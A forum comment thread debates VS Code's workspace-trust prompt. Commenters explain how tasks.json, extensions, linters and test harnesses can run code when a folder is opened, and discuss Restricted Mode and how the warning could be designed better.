You get asked if you trust the folder you’re opening every single time you open a new folder in VsCode. Everyone probably always just says yes but it’s not like it doesn’t tell you that opening untrusted folders is dangerous.
Until this post it wasn't clear to me that just opening and trusting a directory can cause code to be run without taking any other explicit actions that seem like they might involve running code, like running tests. My bad, but still!
mjdv : > it wasn't clear to me that just opening and trusting a directory
andy_ppp : >obviously I wasn’t explicit enough in explaining I’m talking about code execution simply by opening a directory.
Understandably, there's a disconnect in the mental model of what "opening a folder" can mean in VSCode.
In 99% of other software, folders and directories are purely navigation and/or organization and then you must go the extra step of clicking on a particular file (e.g. ".exe", ".py", ".sh") to do something dangerous.
Furthermore, in classic Visual Studio, solutions+projects are files such as ".sln" and ".vcsproj" or a "CMakeLists.txt" file.
In contrast, VSCode projects can be the folders. Folders are not just purely navigation. So "VSCode opening a folder" can act like "MS Excel opening a .xlsm file" that might have a (dangerous) macro in it. Inside the VSCode folder may have a "tasks.json" with dangerous commands in it.
Once the mental model groks the idea that a "folder" can have a special semantic meaning of "project+tasks" in VSCode, the warning messages saying "Do you trust this folder?" make more sense.
VSCode uses "folders" instead of a top-level "file" as a semantic unit because it's more flexible for multiple languages.
To re-emphasize, Windows File Explorer or macOS Finder "opening a folder" do not run "tasks.json" so it is not the same behavior as VSCode opening a folder.
Oh man! Microsoft was the #1 company with this problem for over 25 years and they still do it?
Word and Excel “MACROS” used to be THE main vector for kiddie viruses. Come on M$ … billions of dollars and you’re still loading up non-interactive code execution in all your documents that people expect to be POD (Plain Old Data)?
Is it so much to ask for your software to AT LEAST warn peole when it’s about to take a destructive action, and keep asking until the user allows that class of thing non-interactivlely ONLY FOR THAT SIGNED SOFTWARE?
VS Code does exactly that, warns before loading this non-interactive code. It warns you loudly, with an ugly modal dialog, on opening a new to it folder and suggests Restricted Mode. A lot of the arguments here relate to:
1) This loud warning is easy to ignore, despite how loud it is
2) This loud warning is easy to disable, which many desire to do because it is very loud
3) This loud warning is easy to build bad habits (instead of marking safe parent folders, continually clicking Allow and training yourself to only click Allow)
4) Restricted Mode sounds "too restricted" to be useful (though it isn't too restrictive and is very useful)
5) Restricted Mode is also loud to remind you that you are in it, so many users think it is too loud and never want to be in it (despite it being very useful)
Maybe I'm confused at what you mean, but I don't think there's a huge difference. Loading code is a dangerous action. VS Code is doing exactly what the video is talking about: it gives you a big popup window before doing a dangerous action (that could violate your privacy, that could be malware, that could do things you don't expect).
We want to load code in Turing complete languages. We want complex build tools and test harnesses to load "just so", and those too are generally Turing complete and configured and written in Turing complete languages. Parsing code in a Turing complete language takes another Turing complete language, generally. (Most languages are self-hosted so parsing the code is an action in that same language.)
One of the most dangerous actions we know of is an ancient and inescapable "bug" in all Turing complete work: the Halting Problem. We cannot mathematically prove any program will complete nor when it will complete, without running it and waiting for it to complete, if it completes. Infinite loops are both the power granted to us by our tools and the potential downfall of them all, our responsibility to deal with them is in our hands and math can't help us enough.
Loading code is a dangerous action. VS Code is doing the right thing in how it is handling it. It's not the best user experience and clearly not enough users understand the dangers inherent in "do you really want to run all your extensions in this folder?" in precisely the same way that people better understand "Do you want this application to have access to your precise location?" is a threat (that apps do take advantage; in both cases).
Some instructions are benign, eg to add two numbers or even divide by zero
Other instructions call APIs of the OS
It is at these times that the user should be prompted interactively whether they want the action to be done, with full details of what the scope is, and keep asking every time until the user checks a box that says “continue allowing this action on this scope to THIS program”.
I think I see what you are asking: why isn't it more granular?
In VS Code the granular options exist, too. Restricted Mode is just a pseudo-profile with (almost) no Extensions loaded and a couple other settings disabled. You can use the VS Code profiles and workspace controls to set many other granular in-between states.
I think where the fundamental disagreement I have with your perspective lies, and it is sort of the decades-long "lesson of Windows and Office" (which I'll circle back to) and also one of the deepest, oldest theoretical concerns of Computer Science, is that there is unfortunately no such thing as "benign code". The Halting Problem and its corollary the "Zero-Day Sandbox Exploit in the Universal Turing Machine" suggest that mathematically we have no real tools to determine what is actually benign versus what looks benign.
If you don't like the math theory side of that argument, then we can absolutely discuss the practical, too. We can start with the example you have given that even divide by zero can be benign. That's a pretty good example. We've designed computers so they don't halt and catch fire on a divide by zero, sure, but to do that we have things like stateful error registers and even processor interrupts to jump immediately to different code when a divide by zero happens. Other code could be relying on those error registers as well and may get to its own unexpected state. Interrupts and jumps can be taken advantage of to run code the original program never expected to run.
Little processor-level details like that add up and you get giant messes like SPECTRE/MELTDOWN.
That's also just one low level place to inject malware, you can do it in any programming language anywhere in the stack. This is where VS Code is especially in such an unenviable position because it wants to be a development environment for all possible programming languages so has just about no idea what the full breadth of the stack of programming languages you've configured to want to run in the Extensions that you've installed and the CLI tasks it can automate. VS Code isn't your Operating System (it is not yet trying to be that much like Emacs), it doesn't sandbox your Extensions, it doesn't limit what APIs the CLI build tools you have installed can run.
There are practical exploits of this directly in the article here. More can be found with easy searching. Granularity only helps so much. A big general, loud warning isn't the best experience, but its the closest to the safest option available to VS Code (not just because it isn't your OS, and also OSes are omniscient).
The safest option for VS Code really is "Don't autostart anything, it might be dangerous". Just as Windows has had to stop autorunning JScript and VBScript (once considered "benign"). Just as Windows has had to stop autorunning AUTOEXEC.INI instructions when a CD or USB disk is inserted (once considered "benign"). Just as Office has had to stop running VBA macros on startup (once considered benign). I wish VS Code took a couple more steps towards the Excel experience ("Protected Mode" sounds kinder than "Restricted Mode", it's a subtle difference, but subtle differences matter; fewer flow-interrupting modals and more "quietly default to Protected Mode"), but the general principle here isn't in question in my mind.
But going back to this is also deeply and disturbingly tied back to some of the oldest theories and questions of Computer Science, it also seems useful to remind everyone that if you want to feel truly paranoid, the only safe way to use a computer is to never use a computer. We don't know how to differentiate benign code from dangerous code, we likely never will. Not your OS, not your code editor, not even your abstract Universal Turing Machine you are running with pencil and paper. Unless we find some sort of left-field solution to the Halting Problem, we're kind of stuck with "Computers are inherently dangerous, proceed with caution".
I don't like the way it is handled. Imagine Excel actively prompting you with a pop up every time you open a sheet: "Do you trust the authors of this file? If not you will loose out on cool features and the sheet runs in restricted mode"
No it doesn't because restricted mode without Macros is the default and not framed like something bad or loosing out on all of those nice features,
Exactly that's why I was making the comparison, It's not a in your face PopUp, where users get used to just pressing the blue, highlighted and glowing "I trust the authors" button without even being told what features they'd miss out on.
The Protected view in Office instead tells you "Be careful" and to only activate editing when you need to.
It's also worth noting that this behavior evolved very slowly. It took Excel decades to learn how to best handle the defaults. Excel started with modals similar to VS Code's "Do you want to allow macros? This may be dangerous", found too many users self-trained on "Allow" as the only button that needed to be pressed and eventually built the current solution.
If VS Code is still on the same learning curve, hopefully it speeds up a bit.
Right, I think one of the biggest problems is the name "Restricted Mode" itself. It sounds like a punishment, when it is a safer sandbox. Restricted Mode is great and incredibly useful. But it is unsurprising how people don't like to be in Restricted Mode when it sounds like a doghouse out back, not a lobby or atrium on the way to the rest of the building.
Sure, but as noted elsewhere, the IDEs generally don't "do stuff" by default just on opening a file folder. VSCode, by default, will run some programs as soon as you open a folder.
It's worded really badly, so vscode is the thing that provides the dangerous features? No problem, I know and trust vscode. What the message should be warning about is that the folder may contain dangerous code or configuration values that can execute upon opening due to vscode features that are enabled by default. That sounds worse for them but that would be honest.
But you, as a security conscious software developer, know that the phrase "may automatically execute files" can also be "with malicious intent" - the tradeoff that whoever made the text (and since it's open source it's likely been a committee talking about it for ages) had to make is conciseness vs clarity. Give people too much text and they zone out, especially if their objective is "do this take home exercise to get a job" instead of "open this project carefully to see if there's any security issues in it".
This problem goes back to uh... Windows Vista. Its predecessors made all users an admin, Vista added a security layer so that any more dangerous tasks required you to confirm. But they went overboard and did it for anything like changing your desktop background image, and very quickly people got numb to the notice and just hit 'ok' on everything.
Anyway. In this particular case, VS Code can be more granular and only show a popup when the user tries to run a task saying something like "By permitting this script to run you agree that it can do anything, this can be dangerous, before continuing I'm going to open this file so you can review what it's about to do" or whatever.
- ESLint, the most commonly used linter in the JavaScript ecosystem uses a JavaScript file for configuration (eslint.config.mjs), so if you open a JS project and want your editor to show you warnings from the linter, an extension needs to run that JS
- In Elixir, project configuration is written in code (mix.exs), so if you open an Elixir project and want the language server to provide you with hints (errors, warnings and such), the language server needs to execute that code to get the project configuration. More generally it will probably want to expand macros in the project, which is also code execution.
- For many languages in general, in order to analyze code, editor extensions need to build the project, and this often results in code execution (like through macros or build scripts like build.rs, which I believe rust-analyzer executes)
Thanks! I think it would be better if these types of events were fine grained and you could decide if you wanted to run them the first time but I can understand them being enabled now.
More granular is more likely to train users on "Always Click Allow". The current modal dialog already has that problem and is just one O(N) dialog where N is the number of folders you open (modulo opt-outs). If you got O(N * M) of these where N is the number of folders and M is the number of tasks in tasks.json plus the number of Extensions installed that want to activate in the folder, a) you would probably go a little batty), and b) you would probably stop reading them quickly and just always click Allow.
(It can also be pointed out that a lot of these are granular under the hood. In addition to Restricted Mode as a generally available sandbox, you have all sorts of workspace level controls over tasks.json and the Extensions you have installed and active for that workspace. Not to mention a robust multi-profile system where you can narrow Extensions to specific roles and moods. But most of us tend to want to fall into habits of having a "kitchen sink" profile with everything always available and don't want to think about granular security controls.)
When you open up a folder in VS code, addons can start to set up language servers to index the code in the folder. This usually involves invoking build systems to set those up.
(I think some people are fixating on the specific feature that's mentioned in the article. The reason this pop-up exists is that there are many ways that this code execution could happen. Disabling this one feature doesn't make it safe, and this feature if not present, could still be achieved by abusing other capabilities that exist in the vs code ecosystem)
Makefiles etc. Many types of projects use arbitrary setup and build commands or can load arbitrary plugins, and unlike VS which imposes its own project format, VSC tries to be compatible with everything that people already use. Git hooks are another one.
Please see the reply to the other comment, obviously I wasn’t explicit enough in explaining I’m talking about code execution simply by opening a directory.
Some project types, such as Gradle or Maven projects, use arbitrary commands or plugins in project setup. You have to run arbitrary plugins to know which directories are the source directories, and you have to know which directories are the source directories to do anything in Java.
If you just want to see the files in the directory, then sure. But VS Code is an IDE. It's made for editing software projects which have more structure than that.
The grand parent is talking about code execution can happen by just opening the directory, you’re imagining like I did (and the grandparent) that you have to run or execute something in VSC to get that to happen and I’m asking about what features could possibly require this to happen. Obviously running tests or a make file everyone understands clearly you’re executing other people’s code.
It’s not even running tests. Test extensions usually have to run something to even populate the tests panel in my first place and provide the ability to run à la carte. Thus opening a folder will cause the test collector binary to run.
They could ask and/or parse the tests for the information rather than run them to output it. I’m honestly still not seeing a killer feature here that makes the security implications worth it!
The trouble is that "just parse the tests" isn't always an option and running arbitrary code is the nature of how software is built.
The easiest example is JS testing. Most test harnesses use a JS file for configuration. If you don't know how the harness is configured how do you know you are parsing the right tests?
Most test frameworks in JS use the define/it `define("some test colection", () => it("some test", () => /* …test code… */))` pattern. Tests are built as callbacks to functions.
In theory, sure, you could "just" try to RegEx out the `define("name"` and `it("name"` patterns, but it becomes harder to track nesting than you think it is with just RegEx. Then you realize that because those are code callbacks, no one is stopped from building meta-test suites with things like `for (thing of someTextMatrix) { it(`handles ${thing}`, () => /* …parametric test on thing… */ }`.
The test language used most in JS is JS. It's a lot harder problem than "just parsing" to figure out. In most cases a test harness needs to run the JS files to collect the full information about the test suite. Being JS files they are Turing Complete and open to doing whatever they want. Many times the test harnesses are running in a full Node environment with access to the entire filesystem and more.
Most of that applies to other test harnesses in other languages as well. To get the full suite of possible tests you need to be able to build that language and run it. How much of a sandbox that language has in that case shifts, but often it is still a sandbox with ways to escape. (We've proven that there's an escape Zero Day in the Universal Turing Machine, escapes are in some ways inevitable in any and all Turing Complete languages.)
yeah me as well. at least have the untrusted code allow certain plugins or certain features of plugins to run that you whitelist. not having vim keybindings or syntax highlighting is too barebones.
The message isn't very clear on what exactly is allowed to happen. Just intuitively, I wouldn't have expected simply opening a folder would "automatically execute tasks" because that's strange to me
>Code provides features that may automatically execute files...
What features? What files? "may"? So will it actually happen or is it just "well it possibly could"?
I've used it to open folders that I personally made and which don't have any tasks or files that get automatically executed, and yet the message pops up anyway.
It's like having an antivirus program that unconditionally flags every file as "this file may contain a virus"
> What features? What files? "may"? So will it actually happen or is it just "well it possibly could"?
How is code supposed to know? It probably depends on the plugins you installed.
> It's like having an antivirus program that unconditionally flags every file as "this file may contain a virus"
No, it’s like if your OS asks if you want to actually run the program you’re about to before running it the first time.
And it gives you the alternative to run it in a sandbox (which is equivalent to what happens when you don’t trust the workspace, then it still opens but in restricted mode)
Yeah, because there are a lot of mechanisms by which a folder may start to execute code when you open it outside of restricted mode. A large fraction of addons have something which could be used for this, for example. There isn't a general check that it can apply ahead of time for this.
(They could, with some breaking changes, maybe try to enforce a permissions system for the matrix of addons and folders, where it would ask for permission when an addon does actually try to run something, but this would result in a lot of permission requests for most repos)
They could also, with a breaking change, enforce addons register what sorts of files they'll execute when a folder is opened in trusted mode. If no matching files are found, then opening the folder is safe and no prompt is needed. If matching files are found, then prompt the user and replace "may" with "will". Fewer permission requests, and a clearer message.
People will still inevitably ignore the message and open everything in trusted mode, but it'd be more reasonable to consider that user error.
Thing is, when you open a webpage it's clear that it may automatically execute code (Javascript, WebAssembly). What needs to be clear (and by default limited) is the authority of that code.